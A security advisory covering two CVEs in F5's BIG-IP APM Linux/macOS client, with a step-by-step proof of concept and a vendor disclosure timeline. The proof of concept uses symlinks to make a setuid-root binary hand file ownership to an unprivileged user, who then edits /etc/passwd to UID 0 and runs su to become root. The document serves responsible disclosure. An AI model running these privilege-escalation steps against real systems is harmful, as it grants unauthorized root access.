Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Title: F5 BIG-IP APM client for Linux and macOS vulnerability
Author: Rich Mirch
CVE: CVE-2018-5529 (incomplete fix), CVE-2018-5546
Vendor Advisory: https://support.f5.com/csp/article/K52171282 (CVE-2018-5529)
https://support.f5.com/csp/article/K54431371 (CVE-2018-5546)
Description
The svpn_x86_64 binary included in the F5 Linux CLI Edge Client package
changes the ownership and permissions of several files and directories
under $HOME/.F5Networks which allows local unprivileged users to obtain
ownership of arbitrary files via vectors involving creation of a directory
and a file under that directory, and later replacing that directory or
file with a symlink.
Notes:
1. PoC provided for Linux however macOS is also vulnerable. The svpn binary
is named differently and stored in a different directory on macOS.
2. The policyserver component is also vulnerable to a similar attack against
the $HOME/Library/Logs/F5Networks/policyserver.log file on macOS.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Base: 7.8
Temporal: 7.0
Test Environment
OS: CentOS 64-bit release 6.9 (latest patches as of 2018-04-12)
Kernel: 2.6.32-696.23.1.el6.x86_64
ISO: apmclients-7160.2018.118.2335-4172.0.iso
Proof Of Concept
Two distinct arbitrary file takeover vulnerabilities exist in the
/usr/local/lib/F5Networks/SSLVPN/svpn_x86_64 binary which is setuid root.
1. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks directory.
2. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks/svpn.log file.
Note: A low privileged account named user1 is used for all test cases.
[user1@localhost ~]$ id
uid=500(user1) gid=500(user1) groups=500(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-
s0:c0.c1023
################################################################################
# Test case 1 - take ownership of a directory
# /etc via $HOME/.F5Networks
################################################################################
[Step 1] Create a symlink from /etc to $HOME/.F5Networks
[user1@localhost ~]$ ln -s /etc /home/user1/.F5Networks
[user1@localhost ~]$ ls -ld /etc /home/user1/.F5Networks
drwxr-xr-x. 64 root root 4096 Apr 12 19:29 /etc
lrwxrwxrwx. 1 user1 user1 4 Apr 12 19:38 /home/user1/.F5Networks -> /etc
[Step 2] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[Step 3] Show that user1 is now the owner of /etc.
[user1@localhost ~]$ ls -ld /etc
drwxr-xr-x. 64 user1 user1 4096 Apr 12 19:39 /etc
[Step 4] Modify /etc/passwd and change UID/GID to 0 for user1.
[user1@localhost ~]$ cd /etc
[user1@localhost etc]$ mv passwd passwd.old
[user1@localhost etc]$ cp passwd.old passwd
[user1@localhost etc]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 929 Apr 12 19:40 /etc/passwd
[user1@localhost etc]$ sed -i.orig -e 's/:500:500/:0:0/' /etc/passwd
[user1@localhost etc]$ diff -u /etc/passwd.orig /etc/passwd
--- /etc/passwd.orig 2018-04-12 19:40:02.132987696 -0500
+++ /etc/passwd 2018-04-12 19:41:15.484988778 -0500
@@ -18,4 +18,4 @@
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
-user1:x:500:500::/home/user1:/bin/bash
+user1:x:0:0::/home/user1:/bin/bash
[Step 5] Execute /bin/su - user1 and become root.
[user1@localhost etc]$ /bin/su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
################################################################################
# Test case 2 - take ownership of a file
# /etc/passwd via $HOME/.F5Networks/svpn.log
################################################################################
[Step 1] Create $HOME/.F5Networks.
[user1@localhost ~]$ mkdir -m 755 /home/user1/.F5Networks
[Step 2] Display permissions of /etc/passwd and attempt to write to it.
[user1@localhost ~]$ ls -ld /etc /etc/passwd
drwxr-xr-x. 64 root root 4096 Apr 12 19:41 /etc
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
[user1@localhost ~]$ echo test> /etc/passwd
-bash: /etc/passwd: Permission denied
[user1@localhost ~]$
[Step 3] Create a symlink from /etc/passwd to /home/user1/.F5Networks/svpn.log.
[user1@localhost ~]$ ln -s /etc/passwd /home/user1/.F5Networks/svpn.log
[user1@localhost ~]$ ls -ld .F5Networks/svpn.log /etc/passwd
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
lrwxrwxrwx. 1 user1 user1 11 Apr 12 22:02 .F5Networks/svpn.log -> /etc/passwd
[Step 4] Backup /etc/passwd.
[user1@localhost ~]$ cp -p /etc/passwd passwd.orig
[Step 5] Display contents of /etc/passwd.
[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
[Step 6] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64. user1 is
now the owner of /etc/passwd.
[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 2385 Apr 12 22:14 /etc/passwd
[Step 7] Display contents of /etc/passwd. Notice the log file is appended to the file.
[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Location: /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Version: "7160.2018.0118.1"
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Locale: C
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 48,,,, current log level = 63
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 91, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 92, [main], getuid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 93, [main], getgid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 94, [main], geteuid, 0
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 95, [main], getegid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 96, [main], HOME, /home/user1
2018-04-12,22:14:15:121, 2479,2479,svpn, 48, , 98, [main], version, 7160.2018.0118.1
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 100, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 107, [main], Current sigprocmask: 0xffff8a00
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 33, ReadProperties(), reading of initial configuration timed
out
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 116, [main], Reading settings property failed
[Step 8] Create a new /etc/passwd file and change UID and GID to 0.
[user1@localhost ~]$ sed -e 's/:500:500/:0:0/' < passwd.orig > /etc/passwd
[Step 9] Execute /bin/su - user1 and become root.
[user1@localhost ~]$ su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]#
Timeline:
2018-04-16: Reported to vendor
2018-04-18: Vendor confirmed PoC. Sent to F5 PD for further review
2018-04-25: Vendor confirmed vulnerability and requested embargo
2018-07-12: Vendor released fix in 7.1.7 and advisory K52171282. CVE-2018-5529
2018-07-17: Notified vendor that the fix in 7.1.7 did not properly resolve the issue
2018-07-17: Vendor acknowledged receipt of the incomplete fix report
2018-07-17: Vendor confirmed vulnerability
2018-08-16: Vendor released fix in 7.1.7.1 and advisory K54431371. CVE-2018-5546